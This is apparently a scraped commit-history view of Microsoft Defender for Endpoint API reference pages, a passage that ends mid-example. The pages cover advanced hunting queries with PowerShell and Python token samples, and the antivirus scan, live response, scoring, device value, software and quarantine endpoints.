--- To remove code execution restriction from a device, see [Remove app restriction](unrestrict-code-execution.md).
security Run Advanced Query Api https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/run-advanced-query-api.md
- Title: Advanced Hunting API-
-description: Learn to use the advanced hunting API to run advanced queries on Microsoft Defender for Endpoint. Find out about limitations and see an example.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Advanced hunting API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)
-> [!WARNING]
-> This advanced hunting API is an older version with limited capabilities. A more comprehensive version of the advanced hunting API that can query more tables is already available in the **[Microsoft Graph security API](/graph/api/resources/security-api-overview)**. See **[Advanced hunting using Microsoft Graph security API](/graph/api/resources/security-api-overview#advanced-hunting)**
-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-----
-## Limitations
-
-1. You can only run a query on data from the last 30 days.
-
-2. The results include a maximum of 100,000 rows.
-
-3. The number of executions is limited per tenant:
- - API calls: Up to 45 calls per minute, and up to 1,500 calls per hour.
- - Execution time: 10 minutes of running time every hour and 3 hours of running time a day.
-
-4. The maximal execution time of a single request is 200 seconds.
-
-5. `429` response represents reaching quota limit either by number of requests or by CPU. Read response body to understand what limit was reached.
-
-6. The maximum query result size of a single request can't exceed 124 MB. If exceeded, an HTTP 400 Bad Request with the message "Query execution has exceeded the allowed result size. Optimize your query by limiting the number of results and try again" occurs.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-|Permission type|Permission|Permission display name|
-|:|:|:|
-|Application|AdvancedQuery.Read.All|`Run advanced queries`|
-|Delegated (work or school account)|AdvancedQuery.Read|`Run advanced queries`|
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have the `View Data` role assigned in Microsoft Entra ID
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/advancedqueries/run
-```
-
-## Request headers
-
-Header|Value
-:|:
-Authorization|Bearer {token}. **Required**.
-Content-Type|application/json
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Query|Text|The query to run. **Required**.
-
-## Response
-
-If successful, this method returns 200 OK, and _QueryResponse_ object in the response body.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/advancedqueries/run
-```
-
-```json
-{
- "Query":"DeviceProcessEvents
-|where InitiatingProcessFileName =~ 'powershell.exe'
-|where ProcessCommandLine contains 'appdata'
-|project Timestamp, FileName, InitiatingProcessFileName, DeviceId
-|limit 2"
-}
-```
-
-### Response example
-
-Here's an example of the response.
-
-> [!NOTE]
-> The response object shown here may be truncated for brevity. All of the properties will be returned from an actual call.
-
-```json
-{
- "Schema": [
- {
- "Name": "Timestamp",
- "Type": "DateTime"
- },
- {
- "Name": "FileName",
- "Type": "String"
- },
- {
- "Name": "InitiatingProcessFileName",
- "Type": "String"
- },
- {
- "Name": "DeviceId",
- "Type": "String"
- }
- ],
- "Results": [
- {
- "Timestamp": "2020-02-05T01:10:26.2648757Z",
- "FileName": "csc.exe",
- "InitiatingProcessFileName": "powershell.exe",
- "DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
- },
- {
- "Timestamp": "2020-02-05T01:10:26.5614772Z",
- "FileName": "csc.exe",
- "InitiatingProcessFileName": "powershell.exe",
- "DeviceId": "10cbf9182d4e95660362f65cfa67c7731f62fdb3"
- }
- ]
-}
-```
-
-## Related articles
--- [Use the Microsoft Graph security API - Microsoft Graph | Microsoft Learn](/graph/api/resources/security-api-overview)--- [Microsoft Defender for Endpoint APIs introduction](apis-intro.md)-- [Advanced Hunting from Portal](../advanced-hunting-query-language.md)-- [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security Run Advanced Query Sample Powershell https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/run-advanced-query-sample-powershell.md
- Title: Advanced Hunting with PowerShell API Basics-
-description: Learn the basics of querying the Microsoft Defender for Endpoint API, using PowerShell.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Advanced Hunting using PowerShell
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Run advanced queries using PowerShell. For more information, see [Advanced Hunting API](run-advanced-query-api.md).
-
-In this section, we share PowerShell samples to retrieve a token and use it to run a query.
-
-## Before you begin
-You first need to [create an app](apis-intro.md).
-
-## Preparation instructions
--- Open a PowerShell window.--- If your policy doesn't allow you to run the PowerShell commands, you can run the following command:-
- ```powershell
- Set-ExecutionPolicy -ExecutionPolicy Bypass
- ```
-
-For more information, see [PowerShell documentation](/powershell/module/microsoft.powershell.security/set-executionpolicy).
-
-## Get token
--- Run the following:-
-```powershell
-$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
-$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
-$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
-
-$resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
-$oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token"
-$body = [Ordered] @{
- resource = "$resourceAppIdUri"
- client_id = "$appId"
- client_secret = "$appSecret"
- grant_type = 'client_credentials'
-}
-$response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop
-$aadToken = $response.access_token
-```
-
-Where
-- $tenantId: ID of the tenant on behalf of which you want to run the query (that is, the query is run on the data of this tenant)-- $appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries' permission to Defender for Endpoint)-- $appSecret: Secret of your Microsoft Entra app-
-## Run query
-
-Run the following query:
-
-```powershell
-$token = $aadToken
-$query = 'DeviceRegistryEvents | limit 10' # Paste your own query here
-
-$url = "https://api.securitycenter.microsoft.com/api/advancedhunting/run"
-$headers = @{
- 'Content-Type' = 'application/json'
- Accept = 'application/json'
- Authorization = "Bearer $aadToken"
-}
-$body = ConvertTo-Json -InputObject @{ 'Query' = $query }
-$webResponse = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop
-$response = $webResponse | ConvertFrom-Json
-$results = $response.Results
-$schema = $response.Schema
-```
--- $results contain the results of your query-- $schema contains the schema of the results of your query-
-### Complex queries
-
-If you want to run complex queries (or multilines queries), save your query in a file and, instead of the first line in the above sample, run the following command:
-
-```powershell
-$query = [IO.File]::ReadAllText("C:\myQuery.txt"); # Replace with the path to your file
-```
-
-## Work with query results
-
-You can now use the query results.
-
-To output the results of the query in CSV format in file file1.csv, run the following command:
-
-```powershell
-$results | ConvertTo-Csv -NoTypeInformation | Set-Content C:\file1.csv
-```
-
-To output the results of the query in JSON format in file file1.json, run the following command:
-
-```powershell
-$results | ConvertTo-Json | Set-Content file1.json
-```
--
-## Related article
-- [Microsoft Defender for Endpoint APIs](apis-intro.md)-- [Advanced Hunting API](run-advanced-query-api.md)-- [Advanced Hunting using Python](run-advanced-query-sample-python.md)
security Run Advanced Query Sample Python https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/run-advanced-query-sample-python.md
- Title: Advanced Hunting with Python API Guide-
-description: Learn how to query using the Microsoft Defender for Endpoint API, by using Python, with examples.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Advanced Hunting using Python
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Run advanced queries using Python, see [Advanced Hunting API](run-advanced-query-api.md).
-
-In this section, we share Python samples to retrieve a token and use it to run a query.
-
-> **Prerequisite**: You first need to [create an app](apis-intro.md).
-
-## Get token
--- Run the following commands:-
-```python
-import json
-import urllib.request
-import urllib.parse
-
-tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
-appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
-appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here
-
-url = "https://login.microsoftonline.com/%s/oauth2/token" % (tenantId)
-
-resourceAppIdUri = 'https://api.securitycenter.microsoft.com'
-
-body = {
- 'resource' : resourceAppIdUri,
- 'client_id' : appId,
- 'client_secret' : appSecret,
- 'grant_type' : 'client_credentials'
-}
-
-data = urllib.parse.urlencode(body).encode("utf-8")
-
-req = urllib.request.Request(url, data)
-response = urllib.request.urlopen(req)
-jsonResponse = json.loads(response.read())
-aadToken = jsonResponse["access_token"]
-```
-
-Where
--- tenantId: ID of the tenant on behalf of which you want to run the query (that is, the query is run on the data of this tenant)-- appId: ID of your Microsoft Entra app (the app must have 'Run advanced queries' permission to Microsoft Defender for Endpoint)-- appSecret: Secret of your Microsoft Entra app-
-## Run query
-
- Run the following query:
-
-```python
-query = 'DeviceRegistryEvents | limit 10' # Paste your own query here
-
-url = "https://api.securitycenter.microsoft.com/api/advancedqueries/run"
-headers = {
- 'Content-Type' : 'application/json',
- 'Accept' : 'application/json',
- 'Authorization' : "Bearer " + aadToken
-}
-
-data = json.dumps({ 'Query' : query }).encode("utf-8")
-
-req = urllib.request.Request(url, data, headers)
-response = urllib.request.urlopen(req)
-jsonResponse = json.loads(response.read())
-schema = jsonResponse["Schema"]
-results = jsonResponse["Results"]
-```
--- schema contains the schema of the results of your query-- results contain the results of your query-
-### Complex queries
-
-If you want to run complex queries (or multiline queries), save your query in a file and, instead of the first line in the above sample, run the below command:
-
-```python
-queryFile = open("D:\\Temp\\myQuery.txt", 'r') # Replace with the path to your file
-query = queryFile.read()
-queryFile.close()
-```
-
-## Work with query results
-
-You can now use the query results.
-
-To iterate over the results, use the following command:
-
-```python
-for result in results:
- print(result) # Prints the whole result
- print(result["EventTime"]) # Prints only the property 'EventTime' from the result
-```
-
-To output the results of the query in CSV format in file file1.csv use the following command:
-
-```python
-import csv
-
-outputFile = open("D:\\Temp\\file1.csv", 'w')
-output = csv.writer(outputFile)
-output.writerow(results[0].keys())
-for result in results:
- output.writerow(result.values())
-
-outputFile.close()
-```
-
-To output the results of the query in JSON format in file file1.json use the following command:
-
-```python
-outputFile = open("D:\\Temp\\file1.json", 'w')
-json.dump(results, outputFile)
-outputFile.close()
-```
-
-## Related topic
--- [Microsoft Defender for Endpoint APIs](apis-intro.md)-- [Advanced Hunting API](run-advanced-query-api.md)-- [Advanced Hunting using PowerShell](run-advanced-query-sample-powershell.md)
security Run Av Scan https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/run-av-scan.md
- Title: Run antivirus scan API
-description: Use this API to create calls related to running an antivirus scan on a device.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Run antivirus scan API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Initiate Microsoft Defender Antivirus scan on a device.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-> [!IMPORTANT]
->
-> - This action is available for devices on Windows 10, version 1709 or later, and on Windows 11.
-> - A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Microsoft Defender Antivirus is the active antivirus solution or not. Microsoft Defender Antivirus can be in Passive mode. For more information, see [Microsoft Defender Antivirus compatibility](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility).
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Scan|'Scan machine'
-Delegated (work or school account)|Machine.Scan|'Scan machine'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.security.microsoft.com/api/machines/{id}/runAntiVirusScan
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-ScanType|String|Defines the type of the Scan. **Required**.
-
-**ScanType** controls the type of scan to perform and can be one of the following:
--- **Quick**: Perform quick scan on the device-- **Full**: Perform full scan on the device-
-## Response
-
-If successful, this method returns 201, Created response code and _MachineAction_ object in the response body.
-
-If you send multiple API calls to run an antivirus scan for the same device, it returns "pending machine action" or HTTP 400 with the message "Action is already in progress".
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runAntiVirusScan
-```
-
-```json
-{
- "Comment": "Check machine for viruses due to alert 3212",
- "ScanType": "Full"
-}
-```
security Run Live Response https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/run-live-response.md
- Title: Run live response commands on a device
-description: Learn how to run a sequence of live response commands on a device.
--- NOCSH------ m365-security-- tier3-- must-keep--- Previously updated : 04/18/2023--
-# Run live response commands on a device
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)---
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Runs a sequence of live response commands on a device
-
-## Limitations
-
-1. Rate limitations for this API are 10 calls per minute (additional requests are responded with HTTP 429).
-
-2. 25 concurrently running sessions (requests exceeding the throttling limit receives a "429 - Too many requests" response).
-
-3. If the machine isn't available, the session is queued for up to three days.
-
-4. RunScript command timeouts after 10 minutes.
-
-5. Live response commands can't be queued up and can only be executed one at a time.
-
-6. If the machine that you're trying to run this API call is in an RBAC device group that doesn't have an automated remediation level assigned to it, you need to at least enable the minimum Remediation Level for a given Device Group.
- > [!NOTE]
- > Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-7. Multiple live response commands can be run on a single API call. However, when a live response command fails all the subsequent actions won't be executed.
-
-8. Multiple live response sessions can't be executed on the same machine (if live response action is already running, subsequent requests are responded to with HTTP 400 - ActiveRequestAlreadyExists).
-
-> [!NOTE]
-> Live response actions initiated from the Device page are not available in the machineactions API.
-
-## Minimum Requirements
-
-Before you can initiate a session on a device, make sure you fulfill the following requirements:
--- **Verify that you're running a supported Windows, macOS, or Linux version**.-
- Devices must be running one of the following:
-
- - **Windows 11**
-
- - **Windows 10**
- - [Version 1909](/windows/whats-new/whats-new-windows-10-version-1909) or later
- - [Version 1903](/windows/whats-new/whats-new-windows-10-version-1903) with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)
- - [Version 1809 (RS 5)](/windows/whats-new/whats-new-windows-10-version-1809) with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818)
- - [Version 1803 (RS 4)](/windows/whats-new/whats-new-windows-10-version-1803) with [KB4537795](https://support.microsoft.com/help/4537795/windows-10-update-kb4537795)
- - [Version 1709 (RS 3)](/windows/whats-new/whats-new-windows-10-version-1709) with [KB4537816](https://support.microsoft.com/help/4537816/windows-10-update-kb4537816)
-
- - **Windows Server 2019 - Only applicable for Public preview**
- - Version 1903 or (with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)) later
- - Version 1809 (with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818))
-
- - **Windows Server 2022**
- - **macOS** [(requires additional configuration profiles)](../microsoft-defender-endpoint-mac.md)
- - 13 (Ventura)
- - 12 (Monterey)
- - 11 (Big Sur)
- - **Linux**
- - [Supported Linux server distributions and kernel versions](../microsoft-defender-endpoint-linux.md)
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Get started](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-||||
-|Application|Machine.LiveResponse|Run live response on a specific machine|
-|Delegated (work or school account)|Machine.LiveResponse|Run live response on a specific machine|
-
-## HTTP request
-
-```HTTP
-POST https://api.securitycenter.microsoft.com/API/machines/{machine_id}/runliveresponse
-```
-
-## Request headers
-
-|Name|Type|Description|
-||||
-|Authorization|String|Bearer\<token>\. Required.|
-|Content-Type|string|application/json. Required.|
-
-## Request body
-
-|Parameter|Type|Description|
-||||
-|Comment|String|Comment to associate with the action.|
-|Commands|Array|Commands to run. Allowed values are PutFile, RunScript, GetFile (must be in this order with no limit on repetitions). |
-
-## Commands
-
-|Command Type|Parameters|Description|
-||||
-|PutFile|Key: FileName <p> Value: \<file name\>|Puts a file from the library to the device. Files are saved in a working folder and are deleted when the device restarts by default. NOTE: Doesn't have a response result. |
-|RunScript|Key: ScriptName <br> Value: \<Script from library\> <p> Key: Args <br> Value: \<Script arguments\>|Runs a script from the library on a device. <p> The Args parameter is passed to your script. <p> Timeouts after 10 minutes.|
-|GetFile|Key: Path <br> Value: \<File path\>|Collect file from a device. NOTE: Backslashes in path must be escaped.|
-
-## Response
--- If successful, this method returns 201 Created.-
- Action entity. If machine with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request example
-
-Here's an example of the request.
-
-```HTTP
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/runliveresponse
-
-```JSON
-{
- "Commands":[
- {
- "type":"RunScript",
- "params":[
- {
- "key":"ScriptName",
- "value":"minidump.ps1"
- },
- {
- "key":"Args",
- "value":"OfficeClickToRun"
- }
-
- ]
- },
- {
- "type":"GetFile",
- "params":[
- {
- "key":"Path",
- "value":"C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip"
- }
- ]
- }
- ],
- "Comment":"Testing Live Response API"
-}
-```
-
-### Response example
-
-Here's an example of the response.
-
-Possible values for each command status are "Created", "Completed", and "Failed".
-
-```HTTP
-HTTP/1.1 200 Ok
-```
-
-Content-type: application/json
-
-```JSON
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#MachineActions/$entity",
- "id": "{machine_action_id}",
- "type": "LiveResponse",
- "requestor": "analyst@microsoft.com",
- "requestorComment": "Testing Live Response API",
- "status": "Pending",
- "machineId": "{machine_id}",
- "computerDnsName": "hostname",
- "creationDateTimeUtc": "2021-02-04T15:36:52.7788848Z",
- "lastUpdateDateTimeUtc": "2021-02-04T15:36:52.7788848Z",
- "errorHResult": 0,
- "commands": [
- {
- "index": 0,
- "startTime": null,
- "endTime": null,
- "commandStatus": "Created",
- "errors": [],
- "command": {
- "type": "RunScript",
- "params": [
- {
- "key": "ScriptName",
- "value": "minidump.ps1"
- },{
- "key": "Args",
- "value": "OfficeClickToRun"
- }
- ]
- }
- }, {
- "index": 1,
- "startTime": null,
- "endTime": null,
- "commandStatus": "Created",
- "errors": [],
- "command": {
- "type": "GetFile",
- "params": [{
- "key": "Path", "value": "C:\\windows\\TEMP\\OfficeClickToRun.dmp.zip"
- }
- ]
- }
- }
- ]
-}
-```
-
-## Related topics
--- [Get machine action API](get-machineaction-object.md)-- [Get live response result](get-live-response-result.md)-- [Cancel machine action](cancel-machine-action.md)
security Score https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/score.md
- Title: Score methods and properties
-description: Retrieves your organization's exposure score, device secure score, and exposure score by device group
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Score resource type
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Methods
-
-Method|Return Type|Description
-:|:|:
-[Get exposure score](get-exposure-score.md)|[Score](score.md)|Get the organizational exposure score.
-[Get device secure score](get-device-secure-score.md)|[Score](score.md)|Get the organizational device secure score.
-[List exposure score by device group](get-machine-group-exposure-score.md)|[Score](score.md)|List scores by device group.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Properties
-
-Property|Type|Description
-:|:|:
-Score|Double|The current score.
-Time|DateTime|The date and time in which the call for this API was made.
-RbacGroupName|String|The device group name.
-RbacGroupId|String|The device group ID.
security Set Device Value https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/set-device-value.md
- Title: Set device value API
-description: Learn how to specify the value of a device using a Microsoft Defender for Endpoint API.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Set device value API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Set the device value of a specific [Machine](machine.md).<br>
-See [assign device values](../tvm-assign-device-value.md) for more information.
-
-## Limitations
-
-1. You can post on devices last seen according to your configured retention period.
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Manage security setting'. For more (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the machine, based on machine group settings (See [Create and manage machine groups](../machine-groups.md) for more information)
-
-## HTTP request
-
-```http
-POST https://api.security.microsoft.com/api/machines/{machineId}/setDeviceValue
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-DeviceValue|Enum|Device value. Allowed values are: 'Normal', 'Low' and 'High'. **Required**.
-
-## Response
-
-If successful, this method returns 200 - Ok response code and the updated Machine in the response body.
-
-## Example
-
-### Request
-
-Here is an example of a request that adds machine tag.
-
-```http
-POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/setDeviceValue
-```
-
-```json
-{
- "DeviceValue" : "High"
-}
-```
security Software https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/software.md
- Title: Software methods and properties
-description: Retrieves top recent alerts.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Software resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## Methods
-
-<br>
-
-****
-
-|Method|Return Type|Description|
-||||
-|[List software](get-software.md)|Software collection|List the organizational software inventory|
-|[Get software by ID](get-software-by-id.md)|Software|Get a specific software by its software ID|
-|[List software version distribution](get-software-ver-distribution.md)|Distribution collection|List software version distribution by software ID|
-|[List machines by software](get-machines-by-software.md)|MachineRef collection|Retrieve a list of devices that are associated with the software ID|
-|[List vulnerabilities by software](get-vuln-by-software.md)|[Vulnerability](vulnerability.md) collection|Retrieve a list of vulnerabilities associated with the software ID|
-|[Get missing KBs](get-missing-kbs-software.md)|KB collection|Get a list of missing KBs associated with the software ID|
-|
-
-## Properties
-
-<br>
-
-****
-
-|Property|Type|Description|
-||||
-|id|String|Software ID|
-|Name|String|Software name|
-|Vendor|String|Software publisher name|
-|Weaknesses|Long|Number of discovered vulnerabilities|
-|publicExploit|Boolean|Public exploit exists for some of the vulnerabilities|
-|activeAlert|Boolean|Active alert is associated with this software|
-|exposedMachines|Long|Number of exposed devices|
-|impactScore|Double|Exposure score impact of this software|
-|
security Stop And Quarantine File https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/stop-and-quarantine-file.md
- Title: Stop and quarantine file API
-description: Learn how to stop running a file on a device and delete the file in Microsoft Defender for Endpoint. See an example.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Stop and quarantine file API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Stop execution of a file on a device and delete it.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-> [!IMPORTANT]
-> You can only take this action if:
->
-> - The device you're taking the action on is running Windows 10, version 1703 or later, or Windows 11
-> - The file does not belong to trusted third-party publishers or is not signed by Microsoft
-> - Microsoft Defender Antivirus must at least be running on Passive mode. For more information, see [Microsoft Defender Antivirus compatibility](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-compatibility).
--
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.StopAndQuarantine|'Stop And Quarantine'
-Application|Machine.Read.All|'Read all machine profiles'
-Application|Machine.ReadWrite.All|'Read and write all machine information'
-Delegated (work or school account)|Machine.StopAndQuarantine|'Stop And Quarantine'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/StopAndQuarantineFile
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-Sha1|String|Sha1 of the file to stop and quarantine on the device. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/StopAndQuarantineFile
-```
-
-```json
-{
- "Comment": "Stop and quarantine file on machine due to alert 441688558380765161_2136280442",
